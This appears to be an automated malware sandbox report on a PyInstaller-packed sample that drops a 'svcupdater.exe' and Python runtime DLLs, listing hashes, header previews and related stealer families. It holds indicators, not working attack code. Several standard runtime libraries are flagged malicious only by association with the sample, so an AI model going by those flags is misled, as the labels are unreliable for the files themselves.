	SecuriteInfo.com.Win64.Evo-gen.23205.20359.exe	Get hash	malicious	Unknown	Browse
	1dAlsYrmjy.exe	Get hash	malicious	Mint Stealer	Browse
	1dAlsYrmjy.exe	Get hash	malicious	Mint Stealer	Browse
C:\Users\user\AppData\Local\Temp\_MEI66002\_bz2.pyd	SecuriteInfo.com.FileRepMalware.10144.24483.exe	Get hash	malicious	Discord Token Stealer	Browse
	SecuriteInfo.com.W64.S-e4cd4610.Eldorado.25276.12705.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win64.Evo-gen.25988.30409.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win64.Evo-gen.4079.4864.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win64.Evo-gen.22775.26811.exe	Get hash	malicious	Unknown	Browse
	bomb.bin.exe	Get hash	malicious	LummaC, Amadey, HTMLPhisher, Fabookie, LummaC Stealer, PureLog Stealer, RedLine	Browse
	file.exe	Get hash	malicious	Python Stealer, Stink Stealer	Browse
	MultiCheat.exe	Get hash	malicious	Unknown	Browse
	baliksabit.exe	Get hash	malicious	Unknown	Browse
	G04xjFVx3R.exe	Get hash	malicious	CobaltStrike	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\leaf.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\leaf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1314
Entropy (8bit):	5.3387892510515025
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4sAmE4Ks:MgvjHK5HKH1qHiYHKh3oPtHo6hAHKzeL
MD5:	8C61F9E2B19E0315722C135D70192939
SHA1:	BFC216104805B4183FD0A9153EE0B39076AECCBC
SHA-256:	AFA04F5408E6285A7B01334D40EA524ADB37116790061849F4D6B48D880D93A0
SHA-512:	55CC4879F5AC9C5BDB659D0DC915102B39BC2035CF1C3CADBF3BE6A4447B5613A9D665FC06AD3F461803D04495AAD5EAB0758C02B8F110090FF6F791B80B270D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svcupdater.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1314
Entropy (8bit):	5.3387892510515025
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4sAmE4Ks:MgvjHK5HKH1qHiYHKh3oPtHo6hAHKzeL
MD5:	8C61F9E2B19E0315722C135D70192939
SHA1:	BFC216104805B4183FD0A9153EE0B39076AECCBC
SHA-256:	AFA04F5408E6285A7B01334D40EA524ADB37116790061849F4D6B48D880D93A0
SHA-512:	55CC4879F5AC9C5BDB659D0DC915102B39BC2035CF1C3CADBF3BE6A4447B5613A9D665FC06AD3F461803D04495AAD5EAB0758C02B8F110090FF6F791B80B270D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Temp\_MEI66002\VCRUNTIME140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\lib.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	109392
Entropy (8bit):	6.641929675972235
Encrypted:	false
SSDEEP:	1536:GcghbEGyzXJZDWnEzWG9q4lVOiVgXjO5/woecbq8qZHg2zuCS+zuecL:GV3iC0h9q4v6XjKwoecbq8qBTq+1cL
MD5:	4585A96CC4EEF6AAFD5E27EA09147DC6
SHA1:	489CFFF1B19ABBEC98FDA26AC8958005E88DD0CB
SHA-256:	A8F950B4357EC12CFCCDDC9094CCA56A3D5244B95E09EA6E9A746489F2D58736
SHA-512:	D78260C66331FE3029D2CC1B41A5D002EC651F2E3BBF55076D65839B5E3C6297955AFD4D9AB8951FBDC9F929DBC65EB18B14B59BCE1F2994318564EB4920F286
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Built.exe, Detection: malicious, Browse Filename: LisectAVT_2403002A_424.exe, Detection: malicious, Browse Filename: LisectAVT_2403002A_424.exe, Detection: malicious, Browse Filename: LisectAVT_2403002A_441.exe, Detection: malicious, Browse Filename: Lisect_AVT_24003_G1B_83.exe, Detection: malicious, Browse Filename: QiYc6RUCv8.exe, Detection: malicious, Browse Filename: explorer.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win64.Evo-gen.23205.20359.exe, Detection: malicious, Browse Filename: 1dAlsYrmjy.exe, Detection: malicious, Browse Filename: 1dAlsYrmjy.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........u...u...u.E.t...u.....u...t...u..v...u..q...u..p...u..u...u......u..w...u.Rich..u.........PE..d..._#;..........." ...".....`......................................................=.....`A........................................`C..4....K...............p.......\..PO...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......D..............@....pdata.......p.......H..............@..@_RDATA..\............T..............@..@.rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66002\_bz2.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\lib.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	84752
Entropy (8bit):	6.571095276277803
Encrypted:	false
SSDEEP:	1536:MidQz7pZ3catNZTRGE51LOBK5btb8ksfYqZImCVK7SysPxJ:MEQz9Z5VOwtIksAqZImCVKGxJ
MD5:	A62207FC33140DE460444E191AE19B74
SHA1:	9327D3D4F9D56F1846781BCB0A05719DEA462D74
SHA-256:	EBCAC51449F323AE3AE961A33843029C34B6A82138CCD9214CF99F98DD2148C2
SHA-512:	90F9DB9EE225958CB3E872B79F2C70CB1FD2248EBAA8F3282AFFF9250285852156BF668F5CFEC49A4591B416CE7EBAAAC62D2D887152F5356512F2347E3762B7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: SecuriteInfo.com.FileRepMalware.10144.24483.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W64.S-e4cd4610.Eldorado.25276.12705.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win64.Evo-gen.25988.30409.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win64.Evo-gen.4079.4864.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win64.Evo-gen.22775.26811.exe, Detection: malicious, Browse Filename: bomb.bin.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: MultiCheat.exe, Detection: malicious, Browse Filename: baliksabit.exe, Detection: malicious, Browse Filename: G04xjFVx3R.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{...............b`.....f......f......f......f......f......0f......b.............0f......0f......0f......0f......Rich............PE..d...0.,d.........." ...".....^......L........................................P......0.....`.........................................p...H............0....... .. ......../...@..........T...........................p...@............................................text............................... ..`.rdata..L>.......@..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66002\_ctypes.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\lib.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	123672
Entropy (8bit):	6.058331301105946
Encrypted:	false
SSDEEP:	3072:+7u5LnIx1If3yJdXfLIOAYX5BO8NImLPcPZx:+wxfijXfLIO9BO8
MD5:	9B344F8D7CE5B57E397A475847CC5F66
SHA1:	AFF1CCC2608DA022ECC8D0ABA65D304FE74CDF71
SHA-256:	B1214D7B7EFD9D4B0F465EC3463512A1CBC5F59686267030F072E6CE4B2A95CF
SHA-512:	2B0D9E1B550BF108FA842324AB26555F2A224AEFFF517FDB16DF85693E05ADAF0D77EBE49382848F1EC68DC9B5AE75027A62C33721E42A1566274D1A2B1BAA41
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........G..&...&...&...^...&...Z...&...Z...&...Z...&...Z...&..eZ...&...^...&...^...&..cZ...&...&..W&..eZ...&..eZ...&..eZv..&..eZ...&..Rich.&..........PE..d...(.,d.........." ..."............p\...................................................`.........................................pP.......P.........................../..............T...........................`...@............................................text............................... ..`.rdata...l.......n..................@..@.data...$=...p...8...^..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66002\_decimal.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\lib.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	253200
Entropy (8bit):	6.550053334419209
Encrypted:	false
SSDEEP:	6144:kH26+xqWUSYJqg2Jda6Rc7nxSelwgozq6t3Vs9qWM53pLW1AGgVMtEIbjf:aWUSYJqge47n8elwHjtl0EIjf
MD5:	692C751A1782CC4B54C203546F238B73
SHA1:	A103017AFB7BADAECE8FEE2721C9A9C924AFD989
SHA-256:	C70F05F6BC564FE400527B30C29461E9642FB973F66EEC719D282D3D0B402F93
SHA-512:	1B1AD0CA648BD50CE6E6AF4BE78AD818487AA336318B272417A2E955EAD546C9E0864B515150CD48751A03CA8C62F9EC91306CDA41BAEA52452E3FCC24D57D39
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........xR....................................................s.................../...s.......s.......s.......s.......s.......Rich....................PE..d.....,d.........." ...".x...:...........................................................`......................................... S..P...pS..................@&......./......P.......T...........................P...@............................................text....v.......x.................. ..`.rdata..L............\|..............@..@.data....*...p...$...R..............@....pdata..@&.......(...v..............@..@.rsrc...............................@..@.reloc..P...........................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66002\_hashlib.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\lib.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	65304
Entropy (8bit):	6.2171557507139275
Encrypted:	false
SSDEEP:	1536:aG8njpnxGkYNEusZE/0Cw6cG1xImOI8K7Sy7Px:a7njpnxBZyw6t1xImOI8K1x
MD5:	787B82D4466F393366657B8F1BC5F1A9
SHA1:	658639CDDDA55AC3BFC452DB4EC9CF88851E606B
SHA-256:	241322647BA9F94BDC3AE387413FFB57AE14C8CF88BD564A31FE193C6CA43E37
SHA-512:	AFCF66962958F38EEC8B591AA30D380EB0E1B41028836058FF91B4D1472658DE9FBA3262F5C27BA688BD73DA018E938F398E45911CD37584F623073067F575B6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A.g...g...g....2..g.......g.......g.......g.......g..9....g.......g..?....g...g..yg..9....g..9....g..9.^..g..9....g..Rich.g..................PE..d...?.,d.........." ...".T...~......@?....................................................`.............................................P......................,......../......\...0}..T............................{..@............p..(............................text...YR.......T.................. ..`.rdata...N...p...P...X..............@..@.data...8...........................@....pdata..,...........................@..@.rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66002\_lzma.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\lib.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	159000
Entropy (8bit):	6.8488302124404905
Encrypted:	false
SSDEEP:	3072:5lirS97HrdVmEkGCm5hvznf49mNo2GOvJ02ZImZ1tUtx:5lirG0EkTQAYO2GQ3
MD5:	0C7EA68CA88C07AE6B0A725497067891
SHA1:	C2B61A3E230B30416BC283D1F3EA25678670EB74
SHA-256:	F74AAF0AA08CF90EB1EB23A474CCB7CB706B1EDE7F911DAF7AE68480765BDF11
SHA-512:	FD52F20496A12E6B20279646663D880B1354CFFEA10793506FE4560ED7DA53E4EFBA900AE65C9996FBB3179C83844A9674051385E6E3C26FB2622917351846B9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3.*{w.D(w.D(w.D(~..(s.D(8.E)u.D(8.A){.D(8.@)..D(8.G)t.D(..E)t.D(<.E)u.D(w.E(..D(..I)M.D(..D)v.D(..(v.D(..F)v.D(Richw.D(........PE..d...Q.,d.........." ...".b...........5...............................................^....`..........................................%..L...\%..x....p.......P.......>.../......8.......T...........................p...@............................................text....a.......b.................. ..`.rdata..............f..............@..@.data........@......................@....pdata.......P......................@..@.rsrc........p.......2..............@..@.reloc..8............<..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66002\_multiprocessing.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\lib.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	34584
Entropy (8bit):	6.407217347388664
Encrypted:	false
SSDEEP:	768:+HI6RwgJ5xe5Sc88GnJ8hImWtYV5YiSyvBPxWE9yE:2IoJ5U5Sc88GJ8hImWtY77SyZPx2
MD5:	B320EF859E079BCB5FF71EF645B2DAD6
SHA1:	A392A5D74667C22211C50F4684E6B7948ED0E3B1
SHA-256:	B49FE3B3EFD833AAAD131CE25706126B569D1A1F2EBA4D470EC98FFDFA722767
SHA-512:	09532B48B1502C50D0B8308064FE4A3F141354EB45DC84E7C400BF7CEB2D3A7DCB11B45D497013AD0C6E7698DD8B87C6577C1D67FEA37F4046BCA7D5E529B1DE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Z*\.4y\.4y\.4yU..y^.4y..5x^.4y..1xQ.4y..0xT.4y..7x_.4y..5x^.4y\.5y..4y..5xY.4y..9x^.4y..4x].4y...y].4y..6x].4yRich\.4y................PE..d... .,d.........." ...".....<......0.....................................................`.........................................0D..`....D..x....p.......`.......X.../...........4..T...........................p3..@............0...............................text............................... ..`.rdata..^....0... ..."..............@..@.data........P.......B..............@....pdata.......`.......H..............@..@.rsrc........p.......L..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66002\_queue.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\lib.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	32536
Entropy (8bit):	6.446631742280137
Encrypted:	false
SSDEEP:	768:k+yFc6rXtgmk59NImQUx5YiSyvxAPxWE9HJ:k+wdXWP59NImQU/7Sy5APx7
MD5:	06248702A6CD9D2DD20C0B1C6B02174D
SHA1:	3F14D8AF944FE0D35D17701033FF1501049E856F
SHA-256:	AC177CD84C12E03E3A68BCA30290BC0B8F173EEE518EF1FA6A9DCE3A3E755A93
SHA-512:	5B22BBFF56A8B48655332EBD77387D307F5C0A526626F3654267A34BC4863D8AFAF08FF3946606F3CF00B660530389C37BDFAC91843808DBEBC7373040FEC4C1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_X..1...1...1.......1..0...1..4...1..5...1..2...1.a.0...1..0...1...0...1.a.<...1.a.1...1.a.....1.a.3...1.Rich..1.........PE..d...$.,d.........." ...".....8......................................................b}....`..........................................C..L....C..d....p.......`.......P.../..........p4..T...........................03..@............0..0............................text............................... ..`.rdata..R....0......................@..@.data...x....P.......<..............@....pdata.......`.......@..............@..@.rsrc........p.......D..............@..@.reloc...............N..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66002\_socket.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\lib.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	79632
Entropy (8bit):	6.284864225554789
Encrypted:	false
SSDEEP:	1536:hJleMWdP0ujH9/s+S+pJGQyivViap5NImLw17SyTPxJK:h7eMgsujH9/sT+pJGkvVpp5NImLw1xxU
MD5:	26DD19A1F5285712068B9E41808E8FA0
SHA1:	90C9A112DD34D45256B4F2ED38C1CBBC9F24DBA5
SHA-256:	EAABF6B78840DAEAF96B5BDBF06ADF0E4E2994DFEEE5C5E27FEFD824DBDA5220
SHA-512:	173E1EDA05D297D7DA2193E8566201F05428437ADCAC80AECEFE80F82D46295B15CE10990B5C080325DC59A432A587EEF84A15EC688A62B82493AD501A1E4520
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......NXY..97..97..97..A...97.EE6..97.EE2..97.EE3..97.EE4..97..E6..97..96..97.AA6..97..E:..97..E7..97..E...97..E5..97.Rich.97.................PE..d...M.,d.........." ...".l...........%.......................................P............`.........................................@...P............0....... ..x......../...@..........T...............................@............................................text...&k.......l.................. ..`.rdata..Dt.......v...p..............@..@.data...............................@....pdata..x.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66002\_ssl.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\lib.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	161048
Entropy (8bit):	6.026444402255808
Encrypted:	false
SSDEEP:	3072:iMxkIQQ8JHl+HPXeLeDgcuM8BYZxn8xfCA+nbUtgGoo4AyclUZImC7cbnx:iMxH8JFSGLAuMdnx1UZUf
MD5:	AB0E4FBFFB6977D0196C7D50BC76CF2D
SHA1:	680E581C27D67CD1545C810DBB175C2A2A4EF714
SHA-256:	680AD2DE8A6CFF927822C1D7DD22112A3E8A824E82A7958EE409A7B9CE45EC70
SHA-512:	2BFF84A8EC7A26DDE8D1BB09792EAD8636009C8EF3FA68300A75420197CD7B6C8EAAF8DB6A5F97442723E5228AFA62961F002948E0EEEE8C957C6517547DFFBA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........i...i...i.......i..h...i..l...i..m...i..j...i.o.h...i.i.h...i...h.'.i..h...i.o.d...i.o.i...i.o.....i.o.k...i.Rich..i.........................PE..d...R.,d.........." ..."............l+....................................................`.............................................d............`.......P.......F.../...p..4...0...T...............................@............................................text............................... ..`.rdata..............................@..@.data....j.......f..................@....pdata.......P......."..............@..@.rsrc........`......................@..@.reloc..4....p.......8..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\lib.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1750221
Entropy (8bit):	5.5762045216313085
Encrypted:	false
SSDEEP:	24576:mQR5pATt7xm4lUKdcubgAnyfbas0iwhpM2dYf9P3sL3TWLdma0uHH7:mQR5pQxmmG+KLgaT
MD5:	EBB4F1A115F0692698B5640869F30853
SHA1:	9BA77340A6A32AF08899E7F3C97841724DD78C3F
SHA-256:	4AB0DEB6A298D14A0F50D55DC6CE5673B6C5320817EC255ACF282191642A4576
SHA-512:	3F6BA7D86C9F292344F4AD196F4AE863BF936578DD7CFAC7DC4AAF05C2C78E68D5F813C4ED36048B6678451F1717DEEB77493D8557EE6778C6A70BEB5294D21A
Malicious:	false
Preview:	PK..........!.h%..b...b......._collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................

C:\Users\user\AppData\Local\Temp\_MEI66002\libcrypto-1_1.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\lib.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3450648
Entropy (8bit):	6.098075450035195
Encrypted:	false
SSDEEP:	98304:YP+uemAdn67xfxw6rKsK1CPwDv3uFfJz1CmiX:OZemAYxfxw6HK1CPwDv3uFfJzUmA
MD5:	9D7A0C99256C50AFD5B0560BA2548930
SHA1:	76BD9F13597A46F5283AA35C30B53C21976D0824
SHA-256:	9B7B4A0AD212095A8C2E35C71694D8A1764CD72A829E8E17C8AFE3A55F147939
SHA-512:	CB39AA99B9D98C735FDACF1C5ED68A4D09D11F30262B91F6AA48C3F8520EFF95E499400D0CE7E280CA7A90FF6D7141D2D893EF0B33A8803A1CADB28BA9A9E3E2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........].q...q...q....M..q.......q.......q.......q.......q...q..[q.......q.......q.......s.......q....!..q.......q..Rich.q..........................PE..d......c.........." ..."..$.................................................. 5......%5...`.........................................../..h...Z4.@.....4.\|.....2......x4../....4..O....-.8.............................-.@............P4..............................text.....$.......$................. ..`.rdata..&.....%.......$.............@..@.data...!z....2..,....1.............@....pdata........2.......2.............@..@.idata..^#...P4..$....3.............@..@.00cfg..u.....4.......3.............@..@.rsrc...\|.....4.......3.............@..@.reloc...y....4..z....3.............@..B................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66002\libffi-8.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\lib.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	39696
Entropy (8bit):	6.641880464695502
Encrypted:	false
SSDEEP:	768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
MD5:	0F8E4992CA92BAAF54CC0B43AACCCE21
SHA1:	C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
SHA-256:	EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
SHA-512:	6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".H...(.......L...............................................n....`......................................... l.......p..P...............P....l.../......,...@d...............................c..@............`.. ............................text....G.......H.................. ..`.rdata..h....`.......L..............@..@.data................b..............@....pdata..P............d..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66002\libssl-1_1.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\lib.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	704792
Entropy (8bit):	5.5573527806738126
Encrypted:	false
SSDEEP:	12288:WhO7/rNKmrouK/POt6h+7ToRLgo479dQwwLOpWW/dQ0TGqwfU2lvz2:2is/POtrzbLp5dQ0TGqcU2lvz2
MD5:	BEC0F86F9DA765E2A02C9237259A7898
SHA1:	3CAA604C3FFF88E71F489977E4293A488FB5671C
SHA-256:	D74CE01319AE6F54483A19375524AA39D9F5FD91F06CF7DF238CA25E043130FD
SHA-512:	FFBC4E5FFDB49704E7AA6D74533E5AF76BBE5DB297713D8E59BD296143FE5F145FBB616B343EED3C48ECEACCCCC2431630470D8975A4A17C37EAFCC12EDD19F4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1}q.1}q.1}q.8..=}q.~.p.3}q.z.p.3}q.~.t.=}q.~.u.9}q.~.r.5}q...p.2}q.1}p..\|q...u..}q...q.0}q.....0}q...s.0}q.Rich1}q.........PE..d......c.........." ...".D...T......<................................................i....`..........................................A...N..@U..........s........N......./......h.......8...............................@............@..@............................text....B.......D.................. ..`.rdata.../...`...0...H..............@..@.data...AM.......D...x..............@....pdata...V.......X..................@..@.idata..%W...@...X..................@..@.00cfg..u............l..............@..@.rsrc...s............n..............@..@.reloc..q............v..............@..B................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66002\pyexpat.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\lib.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	199440
Entropy (8bit):	6.378531856504304
Encrypted:	false
SSDEEP:	3072:w1AiI0h9FR8smBjTMZh0b+5giDxbcKinkjXIopWz2nPVQpS1VOWgGbNImLheXxC:1iIqM9T00hiDxbcKkzcPapveZ
MD5:	48E6930E3095F5A2DCF9BAA67098ACFB
SHA1:	DDCD143F386E74E9820A3F838058C4CAA7123A65
SHA-256:	C1ED7017CE55119DF27563D470E7DC3FB29234A7F3CD5FC82D317B6FE559300B
SHA-512:	B50F42F6C7DDBD64BF0FF37F40B8036D253A235FB67693A7F1ED096F5C3B94C2BDE67D0DB63D84A8C710505A891B43F913E1B1044C42B0F5F333D0FE0386A62C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........T..5.5.5.Mu..5..I.5..I.5..I.5..I.5.ZI.5..M.5.5..5.ZI.5.ZI.5.ZI...5.ZI.5.Rich.5.........PE..d...".,d.........." ..."..................................................... ...........`.............................................P................................/..........`3..T........................... 2..@............ ...............................text...W........................... ..`.rdata....... ......................@..@.data...@!..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66002\python311.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\lib.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5760784
Entropy (8bit):	6.086079559835769
Encrypted:	false
SSDEEP:	98304:AtcGVQE2EKmLX3N1fn/q+VHzMzDPFE+syIqPzlJ0:AtcGVQE2XmLX3ffGzJENyIqH0
MD5:	E2BD5AE53427F193B42D64B8E9BF1943
SHA1:	7C317AAD8E2B24C08D3B8B3FBA16DD537411727F
SHA-256:	C4844B05E3A936B130ADEDB854D3C04D49EE54EDB43E9D36F8C4AE94CCB78400
SHA-512:	AE23A6707E539C619FD5C5B4FC6E4734EDC91F89EBE024D25FF2A70168DA6105AC0BD47CF6BF3715AF6411963CAF0ACBB4632464E1619CA6361ABF53ADFE7036
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
